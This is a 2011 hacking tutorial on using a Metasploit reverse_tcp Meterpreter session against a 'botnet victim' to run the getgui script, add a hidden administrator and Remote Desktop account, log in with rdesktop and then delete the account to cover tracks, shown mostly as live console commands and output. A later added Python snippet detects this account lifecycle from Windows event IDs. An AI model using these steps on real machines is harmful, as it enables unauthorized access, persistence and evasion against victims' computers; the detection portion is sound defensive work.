How to enable Remote Desktop Protocol using Metasploit
First of all, exploit your victim.

I am just going to make my botnet victim download the Metasploit backdoor so that a Meterpreter session opens.

Now we are going to see what commands are in getgui.

Code:
[*] Please wait while the Metasploit Pro Console initializes...
[*] Starting Metasploit Console...

       =[ metasploit v4.1.1-release [core:4.1 api:1.0]
+ -- --=[ 754 exploits - 418 auxiliary - 108 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops

[*] Successfully loaded plugin: pro
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 190.95.99.131
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 190.95.99.131:53835) at 2011-12-20 13:19:09 +1030

meterpreter >

We are going to add the username and password to the computer.

Code:
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e

OPTIONS:

    -e   Enable RDP only.
    -f   Forward RDP Connection.
    -h   Help menu.
    -p   The Password of the user to add.
    -u   The Username of the user to add.
Now you can go log on to that computer.

Code:
meterpreter > run getgui -u s3rver -p hacked123
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: s3rver with Password: hacked123
[*]     Adding User: s3rver to local group '╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα'
[*]     Adding User: s3rver to local group '└Σ∞ΦφΦ±≥≡α≥ε≡√'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc C:/Users/doct0r.exe/.msf4/logs/scripts/getgui/clean_up__20111220.2802.rc

Now you should be logged in to that computer.

Code:
s3rver@s3rver~$ rdesktop -u s3rver -p hacked123 190.95.99.131
I will show you how to clean the logs.

The logs should be deleted now.

Code:
meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
[*] Running Command List ...
[*]     Running command execute -H -f cmd.exe -a "/c net user s3rver /delete"
Process 288 created.
meterpreter >
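Seen from the target's side, the account creation, the two group additions and the later "net user ... /delete" shown above are recorded in the Windows Security log when account-management auditing is enabled. The following is an added example, not part of the original post: it correlates event IDs 4720 (account created), 4732 (member added to a local group) and 4726 (account deleted) from Windows Vista/Server 2008 or later, matching groups by well-known SID because the group names are localized, as the getgui output shows. The record layout, field names, account SIDs and timestamps are constructed assumptions.

```python
from datetime import datetime, timedelta

# Well-known SIDs are identical on every Windows language version, unlike the
# localized group names printed in the getgui output.
PRIVILEGED_GROUPS = {"S-1-5-32-544": "Administrators",
                     "S-1-5-32-555": "Remote Desktop Users"}
WINDOW = timedelta(minutes=5)  # assumed correlation window, tune per site

def find_suspect_accounts(events):
    """Flag accounts created (4720) and added (4732) to BOTH privileged
    groups within WINDOW; record a later deletion (4726) if one is seen."""
    created, joined, deleted = {}, {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        sid = ev["account_sid"]
        if ev["id"] == 4720:
            created[sid] = ev
        elif ev["id"] == 4732 and ev.get("group_sid") in PRIVILEGED_GROUPS:
            born = created.get(sid)
            if born and ev["time"] - born["time"] <= WINDOW:
                joined.setdefault(sid, set()).add(ev["group_sid"])
        elif ev["id"] == 4726 and sid in created:
            deleted[sid] = ev["time"]
    return [{"account": created[sid]["name"], "sid": sid,
             "created": created[sid]["time"], "deleted": deleted.get(sid)}
            for sid, groups in joined.items()
            if groups == set(PRIVILEGED_GROUPS)]

def _ev(eid, when, rid, **extra):
    # Simplified record; field names are assumptions, not the raw event XML.
    return {"id": eid, "time": datetime.fromisoformat(when),
            "account_sid": f"S-1-5-21-111-222-333-{rid}", **extra}

SAMPLE_EVENTS = [  # constructed for this example, not real log data
    _ev(4720, "2011-12-20T13:21:02", 1005, name="s3rver"),
    _ev(4732, "2011-12-20T13:21:03", 1005, group_sid="S-1-5-32-555"),
    _ev(4732, "2011-12-20T13:21:03", 1005, group_sid="S-1-5-32-544"),
    _ev(4726, "2011-12-20T13:40:10", 1005),
    _ev(4720, "2011-12-20T09:00:00", 1006, name="helpdesk"),
    _ev(4732, "2011-12-20T09:00:05", 1006, group_sid="S-1-5-32-555"),
    _ev(4732, "2011-12-20T16:00:00", 1006, group_sid="S-1-5-32-544"),
]

if __name__ == "__main__":
    for hit in find_suspect_accounts(SAMPLE_EVENTS):
        print(hit)
```

A finding with a non-empty "deleted" time is an account that was created, given administrator and RDP rights, and removed again, which is the lifecycle the cleanup script produces.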
©2011, copyright BLACK BURN